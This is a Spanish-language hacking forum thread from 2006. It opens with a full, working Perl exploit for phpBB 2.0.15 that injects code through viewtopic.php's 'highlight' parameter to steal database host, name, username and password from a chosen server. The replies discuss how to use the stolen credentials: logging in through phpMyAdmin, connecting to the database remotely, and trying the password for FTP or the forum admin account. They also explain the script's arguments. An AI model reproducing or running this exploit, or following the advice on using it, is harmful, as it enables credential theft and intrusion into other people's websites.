phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

Tema destacado: Seguir a @elhackernet

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit (Leído 3,371 veces)

cH1n0

Desconectado

Mensajes: 9

phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

« en: 28 Enero 2006, 19:52 »

Buenas!
He estado probando este exploit:

Citar

#!/usr/bin/perl

# **************************************************************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# **************************************************************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];

$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";

$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "

Connecting ... Could not connect to host.\n\n";

print "

Connecting OK\n";

sleep(1);

print "

Sending exploit ";

print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";

$succes = 0;

while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}

close($sock);

if ($succes == 1) {
print "OK\n";
sleep(1);
print "

Database Host: " . $array[0] . "\n";

sleep(1);
print "

Database Name: " . $array[1] . "\n";

sleep(1);
print "

Username: " . $array[2] . "\n";

sleep(1);
print "

Password: " . $array[3] . "\n";

sleep(1);
} else {
print "FAILED\n";
}

Y la cuestion es que funciona, te devuelve todos los datos de la BD
Mi pregunta es, una vez que tengo toda esta informacion, como se puede aprovechar?
Gracias de Antemano.


« Última modificación: 28 Enero 2006, 19:58 por cH1n0 »	En línea

Crack_X

Anti-War
Ex-Staff

Desconectado

Mensajes: 2.320

Peace & Love

Re: phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

« Respuesta #1 en: 28 Enero 2006, 21:04 »

Pues puedes conectarte a la BD si acepta conexiones remota (de afuera) y descargar todo. En caso de que encuentres un phpmyadmin de la web pues ya tienes los datos y puedes avisarle al admin del foro sobre ese fallo.


	En línea

Shit loads of money spend to show us wrong from right. Say no to war

Yasser Has Things To Say
WarZone

sirdarckcat

Troll Buena Onda y
CoAdmin

Desconectado

Mensajes: 6.947

Lavando Platos

Re: phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

« Respuesta #2 en: 29 Enero 2006, 02:36 »

mmm este bug es algo viejo, aprovecha el RCE que hay en el valor highlight despues de dar click en un resultado de una busqueda.
imprime los valores $dbhost, $dbuser etc..
tiene otras aplicaciones.. pero si lo quieen para esto, esta bien..

Saludos!!


	En línea

Leer reglas

- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net

cH1n0

Desconectado

Mensajes: 9

Re: phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

« Respuesta #3 en: 30 Enero 2006, 20:58 »

Perdonad, pero estoy un poco pez en esto.
¿Cómo puedo conectarme a la base de datos? ¿Tiene un puerto por defecto para conectarse? ¿Cómo puedo saber que tipo de base de datos es?

Sirdarckcat, ¿qué otras aplicaciones puede tener este bug?

Gracias por la información.


« Última modificación: 30 Enero 2006, 20:59 por cH1n0 »	En línea

Rey11

Desconectado

Mensajes: 3.244

Re: phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

« Respuesta #4 en: 30 Enero 2006, 21:06 »

Pues este bug no es muy util a no ser que tenga el phpmyadmin en su hosting metido o algun programa que precise los datos de bd.
Prueva:
http://laweb/phpMyAdmin/
Puede que encuentres eso y metiendo los datos de usuario y password consigues acceso a la bd y a partir de ahi, a imaginar

Saludos


	En línea

http://www.smforos.net

Ertai

Ex-Staff

Desconectado

Mensajes: 2.026

Ralph Wiggum

Re: phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

« Respuesta #5 en: 30 Enero 2006, 21:54 »

Cita de: Rey11 en 30 Enero 2006, 21:06

Saludos

Borra este mensaje porque no sirve para nada.

Primero, los datos de la BD en el caso de phpMyAdmin estan escritos en un archivo, así que no te sirve de nada que tenga el phpMyAdmin en su host (usando este bug, claro).

Este bug lo que te permite es conectar a la BD. Pero casi nunca se dará el caso que se pueda conectar desde fuera de localhost, así que lo dicho... sirve de muy poco. Puedes probar si es la misma contraseña que en el FTP o del Admin del foro...

Hay programas que te permiten conectar desde Windows al servidor y a la BD.

Busca un poco, yo encontré uno hace poco en SourceForge.

Gooooooogle.


	En línea

Si la felicidad se comprara, entonces el dinero sería noble.

Código:

void rotar_by_ref(int& a, int& b) {
/* Quien dijo que no se podia sin una variable temporal? */
*a = *a ^ *b;
*b = *a ^ *b;
*a = *a ^ *b;
}

Rey11

Desconectado

Mensajes: 3.244

Re: phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

« Respuesta #6 en: 30 Enero 2006, 23:28 »

Pues Ertai yo tengo los mismos datos de conexion en mi foro que en la bd y si algien los supiera se podria meter con el phpmyadmin.
Saludos ::)


	En línea

http://www.smforos.net

Ertai

Ex-Staff

Desconectado

Mensajes: 2.026

Ralph Wiggum

Re: phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

« Respuesta #7 en: 31 Enero 2006, 09:23 »

Cita de: Rey11 en 30 Enero 2006, 23:28

Pues Ertai yo tengo los mismos datos de conexion en mi foro que en la bd y si algien los supiera se podria meter con el phpmyadmin.
Saludos ::)

Sabes lo que estas diciendo?

El phpMyAdmin esta claro que debe llevar los mismos datos de conexión que el foro si apuntan a la misma BD.

Pero no te sirve de nada saber esos datos, porque estan escritos en el config.php, si accedes al phpMyAdmin no te hacen falta saberlos, ya estas dentro.

Solo sirve para conexión externa.


	En línea

Si la felicidad se comprara, entonces el dinero sería noble.

Código:

void rotar_by_ref(int& a, int& b) {
/* Quien dijo que no se podia sin una variable temporal? */
*a = *a ^ *b;
*b = *a ^ *b;
*a = *a ^ *b;
}

cH1n0

Desconectado

Mensajes: 9

Re: phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

« Respuesta #8 en: 31 Enero 2006, 16:20 »

Gracias a todos por las respuestas.
Salu2


	En línea

blackmarux

Desconectado

Mensajes: 14

Re: phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

« Respuesta #9 en: 21 Febrero 2006, 06:27 »

por ejemplo

c:\PERL\BIN>perl exploit.pl bbstyle.pl www.sitio.com /phpbb/ 20

el ultimo numero que en el ejemplo tira ... que significa :huh:


	En línea

-----black marux------ grrrr

[/table]

Saludos!!

sirdarckcat

Troll Buena Onda y
CoAdmin

Desconectado

Mensajes: 6.947

Lavando Platos

Re: phpBB <= 2.0.15 Remote SQL Database Credentials Disclosure Exploit

« Respuesta #10 en: 21 Febrero 2006, 06:36 »

esta mas que claro, antes de preguntar lee.
THREADID[/td]

bbstyle.pl	www.sitio.com	/phpbb/	20
phpbbSecureD.pl	SERVER	DIR


	En línea

Leer reglas

- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	sobre Remote File Disclosure Nivel Web	sancakoky	2	1,252	23 Noviembre 2010, 12:31 por sancakoky